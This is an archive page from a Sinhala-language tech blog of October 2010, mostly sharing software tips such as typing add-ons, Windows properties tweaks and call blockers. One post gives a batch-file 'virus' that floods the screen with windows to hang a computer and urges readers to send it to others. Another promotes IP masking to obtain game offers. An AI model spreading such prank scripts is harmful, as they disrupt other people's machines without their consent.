All Stories

October 28, 2010

සිංහලෙන් ඔයාල​ට ලිපි ලියන මට එපා වෙලා තිබුන දෙයක් තමයි Type කරන කොට සිංහල වල​ටයි English වලටයි මාරැ වෙවි ඉන්න එක?එත් ම​ට නමි ඒකට හොද විසදුමක් හමිබ උනා?හැබැයි මෙික ​Firefox Add-ons එකක්?මෙක දාගත්ත නිසා දැන් කිසි කරදරයක් නැතුව Type කරගෙන යන්න ම​ට පුලුවන් වෙලා තියෙනවා?කරන්න තියෙන්නේ මෙක දාගෙන English Type කරන කොට F8 ඔබන්නයි,සිංහල Type කරනකොට F9 ඔබන එකයි,සිංglish ඔිනි නමි F12 ඔබන එක විතරයි?එතකොට අපි දැන් පාවිචිචි කරන්නේ සිංහලද,English ද,සිංglish ද කියන එක Firefox වල දකුනු පැත්තේ පහලින් වැටෙනවා?ඒතනම Key Board Layout එකත් තියෙනවා ඔිනි නමි බලාගන්න පුලුවන්?මෙක අපේම රටෙි කෙනෙක්ගේ වැඩක් ඒ නිසා Download කරගෙන එයාගේ නිර්මානය ​ගැන Comment එකකින් කියලා යන්න?

2011-08-01 Update:
මෙි ලිපිය කියවපු නදුන් දිසානායක සහෝදරයා මෙ වැඩෙිම Left Alt + Left Shift පාවිචිචි කරලා බලන්න කිවිවා?කථාව ඇත්ත ඒක වැඩ කරනවා?මෙ add-ons බාන්නේ නැතුව මෙ විදියත් පාවිචිචි කරන්න පුලුවන්?මෙ ගැන කියපු නදුන් සහෝදරයට අපේ ස්තුතිය.

සිංහලෙන් දඩි බිඩි ගාලා Type කරන්න?

Dilshan Wijesooriya   at  Thursday, October 28, 2010  17 comments

සිංහලෙන් ඔයාල​ට ලිපි ලියන මට එපා වෙලා තිබුන දෙයක් තමයි Type කරන කොට සිංහල වල​ටයි English වලටයි මාරැ වෙවි ඉන්න එක?එත් ම​ට නමි ඒකට හොද විසදුමක් හමිබ උනා?හැබැයි මෙික ​Firefox Add-ons එකක්?මෙක දාගත්ත නිසා දැන් කිසි කරදරයක් නැතුව Type කරගෙන යන්න ම​ට පුලුවන් වෙලා තියෙනවා?කරන්න තියෙන්නේ මෙක දාගෙන English Type කරන කොට F8 ඔබන්නයි,සිංහල Type කරනකොට F9 ඔබන එකයි,සිංglish ඔිනි නමි F12 ඔබන එක විතරයි?එතකොට අපි දැන් පාවිචිචි කරන්නේ සිංහලද,English ද,සිංglish ද කියන එක Firefox වල දකුනු පැත්තේ පහලින් වැටෙනවා?ඒතනම Key Board Layout එකත් තියෙනවා ඔිනි නමි බලාගන්න පුලුවන්?මෙක අපේම රටෙි කෙනෙක්ගේ වැඩක් ඒ නිසා Download කරගෙන එයාගේ නිර්මානය ​ගැන Comment එකකින් කියලා යන්න?

2011-08-01 Update:
මෙි ලිපිය කියවපු නදුන් දිසානායක සහෝදරයා මෙ වැඩෙිම Left Alt + Left Shift පාවිචිචි කරලා බලන්න කිවිවා?කථාව ඇත්ත ඒක වැඩ කරනවා?මෙ add-ons බාන්නේ නැතුව මෙ විදියත් පාවිචිචි කරන්න පුලුවන්?මෙ ගැන කියපු නදුන් සහෝදරයට අපේ ස්තුතිය.

Continue Reading→

17 comments:

October 26, 2010

හුගක් අය Software,Movies වගේ දේවල් බාගන්නේ Torrent හරහා?ඒත් සමහර වෙලාව‍ට සමහර Torrent Download වෙන්නේ හුගක් හිමින් නේද?මෙන්න ඒකට පුංචි විසදුමක්?මෙි Software එකෙන් කරන්නේ Torrent Files Download වෙන වෙීගය වැඩි කරන එක,ඒ කියන්නේ Accelerate කරන එක?

අපේ කටිටිය වැඩිපුරම Use කරන්නේ Bittorrent හා Utorrent නිසා ඒ දෙකට හරියන Software එක දෙන්න හිතුවා?

එහෙනමි මුලින්ම Software එක බාගෙන Install කරගන්න?
ඊට පස්සේ Software එක‍ට ගිහින් Network Interface එක මොකක්ද කියලා දාලා,Accelerate කියන Button එක ඔබන්න,එචිචරයි?ඊට පස්සේ බලන්න Torrent ‍වෙීගයෙන් Download වෙයි?හැබැයි Computer එක Off කරලා On කරන වාරයක් පාසා Software එක On කරන්න වෙයි?

Torrent වලින් වෙීගයෙන් බාන්න,Speedup Pro?

Dilshan Wijesooriya   at  Tuesday, October 26, 2010  25 comments

හුගක් අය Software,Movies වගේ දේවල් බාගන්නේ Torrent හරහා?ඒත් සමහර වෙලාව‍ට සමහර Torrent Download වෙන්නේ හුගක් හිමින් නේද?මෙන්න ඒකට පුංචි විසදුමක්?මෙි Software එකෙන් කරන්නේ Torrent Files Download වෙන වෙීගය වැඩි කරන එක,ඒ කියන්නේ Accelerate කරන එක?

අපේ කටිටිය වැඩිපුරම Use කරන්නේ Bittorrent හා Utorrent නිසා ඒ දෙකට හරියන Software එක දෙන්න හිතුවා?

එහෙනමි මුලින්ම Software එක බාගෙන Install කරගන්න?
ඊට පස්සේ Software එක‍ට ගිහින් Network Interface එක මොකක්ද කියලා දාලා,Accelerate කියන Button එක ඔබන්න,එචිචරයි?ඊට පස්සේ බලන්න Torrent ‍වෙීගයෙන් Download වෙයි?හැබැයි Computer එක Off කරලා On කරන වාරයක් පාසා Software එක On කරන්න වෙයි?

Continue Reading→

25 comments:

October 21, 2010

අද දින Software සිංහලෙන්.com අඩවිය වි‍ශේෂ දිනයකි?එනමි අද දිනය වන විට මෙම අඩවියට පැමිණි මුලු ගනන 10000 පසු කල බැවිනි?2010 මැයි සිට මෙි දක්වා,එනමි මාස 5ක් තුල මෙම ගණන සපුරා ගැනීම‍ට හැකි වීම මාගේ සතුටට ක‍ාරනයකි.මෙම අරමුණ සපුරා ගැනීම‍ට සහය දැක්වූ ඔබ සැමට මාගේ ස්තුතිය හිමිවෙි?

Software සිංහලෙන් ජයග්රාහි 10000 පසුකරයි?

Dilshan Wijesooriya   at  Thursday, October 21, 2010  No comments

අද දින Software සිංහලෙන්.com අඩවිය වි‍ශේෂ දිනයකි?එනමි අද දිනය වන විට මෙම අඩවියට පැමිණි මුලු ගනන 10000 පසු කල බැවිනි?2010 මැයි සිට මෙි දක්වා,එනමි මාස 5ක් තුල මෙම ගණන සපුරා ගැනීම‍ට හැකි වීම මාගේ සතුටට ක‍ාරනයකි.මෙම අරමුණ සපුරා ගැනීම‍ට සහය දැක්වූ ඔබ සැමට මාගේ ස්තුතිය හිමිවෙි?
Continue Reading→

0 comments:

October 19, 2010

My Computer Properties වලට තමන්ගෙ Photo එකක් දාගමුද කියන ලිපිය පල උනාට පස්සේ ගොඩක් අය ඇහුවා Windows 7 වල‍ට හරියන්නේ නැද්ද කියලා.ඔන්න ඒ ලිපිය බලපු කෙනෙක් Windows 7 වල Properties Edit කරන්න පුලුවන් Software එකක් ගැන Comment කරලා තිබුනා,ගොඩක් අය මෙි ගැන උනන්දු නිසා ඒ ගැන ඔයාලට කියන්න මම හිතුවා?
මුලින්ම මම ස්තුති කරන්න ඔිනි මට මෙ ගැන කියපු ඉරෝෂාන් සහෝදරයාට,

එහෙනමි වැ‍ෙඩිට බහිමු,මුලින්ම මෙි Software එක බාගන්න,ඊට පස්සේ Install කරගන්න?අන්තිම‍ට Software එකට ගිහින් තමන්ට ඔිනි විදියක‍ට Computer එකේ විස්තර වෙනස් කරන්න?
මෙික කියපු ඉරෝෂාන් සහෝදරයා නමි තමන්ගේ RAM එක 16GB කියලා දාගත්තාලු?

අඩුම තරමෙි මමවත් මෙි Software එක තාම Try කරලා බැලුවෙ නැහැ,මුලින්ම ඔයාලට කියන්න හිතුන නිසා,එහෙනමි Try කරලා බලලා Comment එකක් දාලා මෙි Software එක ගැන කියලා යන්න?

Windows 7 Properties Edit කරන්න?

Dilshan Wijesooriya   at  Tuesday, October 19, 2010  6 comments

My Computer Properties වලට තමන්ගෙ Photo එකක් දාගමුද කියන ලිපිය පල උනාට පස්සේ ගොඩක් අය ඇහුවා Windows 7 වල‍ට හරියන්නේ නැද්ද කියලා.ඔන්න ඒ ලිපිය බලපු කෙනෙක් Windows 7 වල Properties Edit කරන්න පුලුවන් Software එකක් ගැන Comment කරලා තිබුනා,ගොඩක් අය මෙි ගැන උනන්දු නිසා ඒ ගැන ඔයාලට කියන්න මම හිතුවා?
මුලින්ම මම ස්තුති කරන්න ඔිනි මට මෙ ගැන කියපු ඉරෝෂාන් සහෝදරයාට,

එහෙනමි වැ‍ෙඩිට බහිමු,මුලින්ම මෙි Software එක බාගන්න,ඊට පස්සේ Install කරගන්න?අන්තිම‍ට Software එකට ගිහින් තමන්ට ඔිනි විදියක‍ට Computer එකේ විස්තර වෙනස් කරන්න?
මෙික කියපු ඉරෝෂාන් සහෝදරයා නමි තමන්ගේ RAM එක 16GB කියලා දාගත්තාලු?

අඩුම තරමෙි මමවත් මෙි Software එක තාම Try කරලා බැලුවෙ නැහැ,මුලින්ම ඔයාලට කියන්න හිතුන නිසා,එහෙනමි Try කරලා බලලා Comment එකක් දාලා මෙි Software එක ගැන කියලා යන්න?

Continue Reading→

6 comments:

October 16, 2010

කැමති නැද්ද My Computer Properties වලට තමන්ගෙ Photo එකකුයි,තමන්ට ඔිනි විස්තරයි දාගන්න?එහෙම ආසාවක් මෙික අහලා වත් ආව‍ානමි මෙ විදියට උත්සහ කරලා බලන්න පුලුවන් ඔයාලට?

පියවර 1

මුලින්ම යන්න Note Pad වලට,ගිහිල්ලා මෙි Code එක ගහන්න,

[General]
Manufacturer="Name"
Model="Model "
[Support Information]
Line1="Iformation 1"
Line2="Information 2"
Line3="Mobile: "
Line4="Contact: "
Line5="Email ID:"

ගහලා ඉවර වෙලා තමන්ට ඔිනි විදියට Details වෙනස් කරන්න("මෙි කොමා දෙක ඇතුලේ තියෙන එ්වා විතරයි")ඔිකෙ පලවෙනි පේලි දෙකේ තියෙන Manufacturer,Model කියන ඒවා My Computer Properties Window එකේ පෙන්නනවා,අනිත් ටිකට Support Information කියලා ‍Button එකක් එනවා,ඒක Click කරාම අනිත් විස්තර පෙන්නනවා.

දැන් ඒ Text එක Save කරගමු,
නම‍ට OEMINFO.ini කියලා දාන්න,Save කරන්න ඔිනි C:\WINDOWS\System32 කියන Folder එක‍ට?

පියවර 2 
දැන් අපි අපිට ඔිනි Photo එක My Computer Properties වලට දාමු.

මුලින්ම තමන්ට දාන්න ඔිනි Photo එක 150x150 pixel Size එක‍‍ට bmp Format එකෙන් හදාගන්න,ඊට පස්සේ ඒක Rename කරන්න OEMLOGO.bmp කියලා,C:\WINDOWS\System32 Folder එක‍ට ඒ Photo එක Copy කරන්න?

අන්තිමට Computer එක Restart කරන්්න,ඊට පස්සේ  My Computer Properties වලට ගිහින් බලන්න?

තමන්ට ඔිනි Photo එක විතරක් හරි Text එක විතරක් හරි දාන්න නමි ඒ සදහා පාවිචිචි කරන පියවර විතරක් අනුගමනය කරන්නත් පුලුවන්?

කරලා බලල‍ා Comment එකකින් හොද නරක කියලා යන්න?

My Computer Properties වලට තමන්ගෙ Photo එකක් දාගමුද?

Dilshan Wijesooriya   at  Saturday, October 16, 2010  11 comments

11 comments:

October 15, 2010

මෙන්න Skype වල අලුත්ම සංස්කරණය නිකුත් වෙලා?කලින් ඒවාට වඩා ගොඩක් Advance වෙලා,ඒ එක්කම Skype වලින් Facebook ලොග් වෙන්න පුලුවන් කරලා?තවත් ගොඩක් අංග එකතුවෙලා තියෙනවා,අරගෙනම බලන්න?

Skype 5 අලුත්ම සංස්කරණය Facebook Login සහිතව?

Dilshan Wijesooriya   at  Friday, October 15, 2010  No comments

මෙන්න Skype වල අලුත්ම සංස්කරණය නිකුත් වෙලා?කලින් ඒවාට වඩා ගොඩක් Advance වෙලා,ඒ එක්කම Skype වලින් Facebook ලොග් වෙන්න පුලුවන් කරලා?තවත් ගොඩක් අංග එකතුවෙලා තියෙනවා,අරගෙනම බලන්න?

Continue Reading→

0 comments:

October 13, 2010

අදත් ඔන්න Note pad පිස්සුවක් ගෙනාවා?හැබැයි මෙික නමි කලින් දුන්න එ්වා‍ට වඩා දරැණුයි.මෙකද මෙිකට පුලුවන් Computer එක Stuck කරන්න?මෙන්න මෙීකයි සිද්ධිය මෙි Code එක ගහලා හදාගන්න file එක කවුරැ හරි Open කරොත් Internet Explorer,My Document වගේ එ්වා දිගට හරහට Open වෙනව‍ා.කීපාරක් Open වෙනව‍ාද කියන එක Virus එක හදන අපිට පාලනය කරන්න පුලුවන්!හැබැයි පරිගනකයට හානියක් නැහැ,වැඩිම උනොත් කලින් කිවිවා වගේ Stuck වෙයි?

දැන් එහෙනමි මුලින්ම Note pad Open කරගන්න,ඊට පස්සේ මෙ Code එක ගහගන්න,නැත්නමි ඉතින් Copy කරලා Paste කරගන්න?

@echo off
:A
start dir
start command
start iexpore.exe
start run
start explorer

මම කලින් කියපු වාර ගාන හදාගන්න ඔිනි මෙහෙමයි.start dir කියලා තියෙන තැන ඉදන් ප‍ටන්ගන්න ට‍ික තමන්ට ඔිනි ගානක් Copy කරලා Paste කරගන්න,ඒ කියන්නේ දෙපාරක් ඔිනි නමි,
@echo off
:A
start dir
start command
start iexpore.exe
start run
start explorer
start dir
start command
start iexpore.exe
start run
start explorer

මෙි වගේ ඔිනි තරමක් Paste කරන්න,Paste කරන ග‍ාන වැඩිවෙන කොට Computer එක Stuck වෙන්න බලනවා,

අන්තිමට තමන් කැමති නමකින් Save කරන්න,නමෙි අන්තිමට .bat කියලා තියලා ex : Virus.bat
දැන් Virus එක හදලා ඉවරයි?ක‍‍ාට හරි යවලා බලන්‍නකෝ මොකද වෙන්නේ කියලා?තමන්ටම උත්සහ කරන්න ඔිනි නමි Code එක වැඩිපුර Type නොකර උත්සහ කරලා බලන්න පුලුවන් :D

වයිරස් Spam බෝමිබයක් හදමුද?

Dilshan Wijesooriya   at  Wednesday, October 13, 2010  1 comment

1 comments:

October 8, 2010

කලින් ලිපියක (කරදරකාරි දූරකථන ඇමතුමි හිසරදයක් වෙලාද) තිබුන Software එකට වඩා ගොඩක් හොද Mobile Black List Software එකක් මෙීක?කලින් එක නමි Free පාවිචිචි කරන්න පුලුවන් ටික කාලයයි,ඊට පස්සේ සල්ලි ගෙවලා License එක ගන්න ඔිනි?ඒත් මෙි Software එක එහෙම නැහැ හැමදාටම Free ,මමත් අත්තර් ජංජාලයේ රවුමි ගහන කොට මෙික හමිබ උනේ?කලින් එක‍ට වඩා ගොඩක් User Friendly.

මෙික පාවිචිචි කරලා අපිට පුලුවන් අනවශ්‍ය අංක Black List කරන්න.අවශ්‍ය නමි SMS එකකින් ඒ අංකය‍ට ඒ ගැන දන්වන්න,SMS block කරන්න.අවශ්‍ය අංක වලින් විතරක් එන ඇමතුමි Accept කරන්න වගේ ගොඩක් දේවල්?Mobile එක‍ට දාගෙන පලවෙනි සැරේ අන්තර්ජාලය‍ට සමිබන්ද වෙලා Software එක Register කරන්න විතරයි ඔිනි වෙන්නේ,ඊට පස්සේ Free පාවිචිචි කරන්න පුලුවන්?මම කියනව‍ට වඩා දෙයක් මෙි Software එකෙන් කරන්න පුලුවන් බාගෙන බලන්න?

හැබැයි මෙී Software එක Support කරන්නේ Symbian හා Android මෙහෙයිමි පද්ධති ති‍යෙන ජංගම දුරකථන සදහා පමණයි

අනවශ්‍ය ඇමතුමි SMS නොමිලේම මග අරින්න!

Dilshan Wijesooriya   at  Friday, October 08, 2010  10 comments

කලින් ලිපියක (කරදරකාරි දූරකථන ඇමතුමි හිසරදයක් වෙලාද) තිබුන Software එකට වඩා ගොඩක් හොද Mobile Black List Software එකක් මෙීක?කලින් එක නමි Free පාවිචිචි කරන්න පුලුවන් ටික කාලයයි,ඊට පස්සේ සල්ලි ගෙවලා License එක ගන්න ඔිනි?ඒත් මෙි Software එක එහෙම නැහැ හැමදාටම Free ,මමත් අත්තර් ජංජාලයේ රවුමි ගහන කොට මෙික හමිබ උනේ?කලින් එක‍ට වඩා ගොඩක් User Friendly.

මෙික පාවිචිචි කරලා අපිට පුලුවන් අනවශ්‍ය අංක Black List කරන්න.අවශ්‍ය නමි SMS එකකින් ඒ අංකය‍ට ඒ ගැන දන්වන්න,SMS block කරන්න.අවශ්‍ය අංක වලින් විතරක් එන ඇමතුමි Accept කරන්න වගේ ගොඩක් දේවල්?Mobile එක‍ට දාගෙන පලවෙනි සැරේ අන්තර්ජාලය‍ට සමිබන්ද වෙලා Software එක Register කරන්න විතරයි ඔිනි වෙන්නේ,ඊට පස්සේ Free පාවිචිචි කරන්න පුලුවන්?මම කියනව‍ට වඩා දෙයක් මෙි Software එකෙන් කරන්න පුලුවන් බාගෙන බලන්න?

හැබැයි මෙී Software එක Support කරන්නේ Symbian හා Android මෙහෙයිමි පද්ධති ති‍යෙන ජංගම දුරකථන සදහා පමණයි
Continue Reading→

10 comments:

October 6, 2010

මෙීක නමි ගොඩක් වටින Software එකක්.මෙකෙන් කරන්නේ අපි අන්තර්ජාලය‍ට සමිබන්ද වන IP Address එක අපිට ඔිනි ව‍ිදියට වෙනස් කරන එක.එ් කියන්නේ අපේ රටෙි IP Address එක වෙනුවට වෙන ර‍ටක IP Address එකක් උනත් දාන්න පුලුවන් කියන එක.අපි හැමෝම එක එක Web Site වලට යනව‍ා?ඒත් සමහර වෙලාවට අපි දන්නෙම නැතුව අපේ IP Address එක ගැන විස්තර ගන්නවා?එතකොට එයාලට අපි ඉන්නේ කොහෙද ?අපිට Internet සේවය දෙන්නේ කවුද ?අපි පාවිච්චි කරන Operating System එක මොකක්ද?Web Browser එක මොකක්ද? කියන දේවල් වගේ ගොඩක් විස්තර ගන්න පුළුවන්.ඒත් මෙික පාවිචිචි කරාම එයාලට ලැබෙන්නේ බොරැ විස්තර?

අනෙක් සුභ ආරංචිය ඔයාලා Barn Buddy වගේ Games ගහනවා නමි මෙීකෙන් වෙන රටක IP Address එකක් දාලා Credits සත්තු Offers වගේ දේවල් ගන්නත් පුලුවන්?

IP Address වෙස් ගැන්වීම!

Dilshan Wijesooriya   at  Wednesday, October 06, 2010  12 comments

මෙීක නමි ගොඩක් වටින Software එකක්.මෙකෙන් කරන්නේ අපි අන්තර්ජාලය‍ට සමිබන්ද වන IP Address එක අපිට ඔිනි ව‍ිදියට වෙනස් කරන එක.එ් කියන්නේ අපේ රටෙි IP Address එක වෙනුවට වෙන ර‍ටක IP Address එකක් උනත් දාන්න පුලුවන් කියන එක.අපි හැමෝම එක එක Web Site වලට යනව‍ා?ඒත් සමහර වෙලාවට අපි දන්නෙම නැතුව අපේ IP Address එක ගැන විස්තර ගන්නවා?එතකොට එයාලට අපි ඉන්නේ කොහෙද ?අපිට Internet සේවය දෙන්නේ කවුද ?අපි පාවිච්චි කරන Operating System එක මොකක්ද?Web Browser එක මොකක්ද? කියන දේවල් වගේ ගොඩක් විස්තර ගන්න පුළුවන්.ඒත් මෙික පාවිචිචි කරාම එයාලට ලැබෙන්නේ බොරැ විස්තර?

අනෙක් සුභ ආරංචිය ඔයාලා Barn Buddy වගේ Games ගහනවා නමි මෙීකෙන් වෙන රටක IP Address එකක් දාලා Credits සත්තු Offers වගේ දේවල් ගන්නත් පුලුවන්?

Continue Reading→

12 comments:

October 1, 2010

අපි හැමෙීම ඔහේ ජීවත් වෙනවා,නිකමටවත් ගනන් කරලා බැලුවද තමන් දවස් කීයන් ජීවත් වෙලා තියෙනවද කියලා.මෙි කතාව අහල‍ා දවස් කීයන් ජීවත් වෙලා තියෙනවද කියලා බලන්න ආසාවක් ආව‍ා නමි මෙන්න පුංචීම පුංචී Software එකක් Size එක 112KB?Download කරගෙන බලන්න,අපේම කොල්ලෙක්ගේ වැඩක් මෙීක?

දවස් කීයක් ජීවත් වෙලාද?

Dilshan Wijesooriya   at  Friday, October 01, 2010  1 comment

අපි හැමෙීම ඔහේ ජීවත් වෙනවා,නිකමටවත් ගනන් කරලා බැලුවද තමන් දවස් කීයන් ජීවත් වෙලා තියෙනවද කියලා.මෙි කතාව අහල‍ා දවස් කීයන් ජීවත් වෙලා තියෙනවද කියලා බලන්න ආසාවක් ආව‍ා නමි මෙන්න පුංචීම පුංචී Software එකක් Size එක 112KB?Download කරගෙන බලන්න,අපේම කොල්ලෙක්ගේ වැඩක් මෙීක?

Continue Reading→

1 comments:

Discussion

Blog Archive

Recently Viewed

Powered by Blogger.
.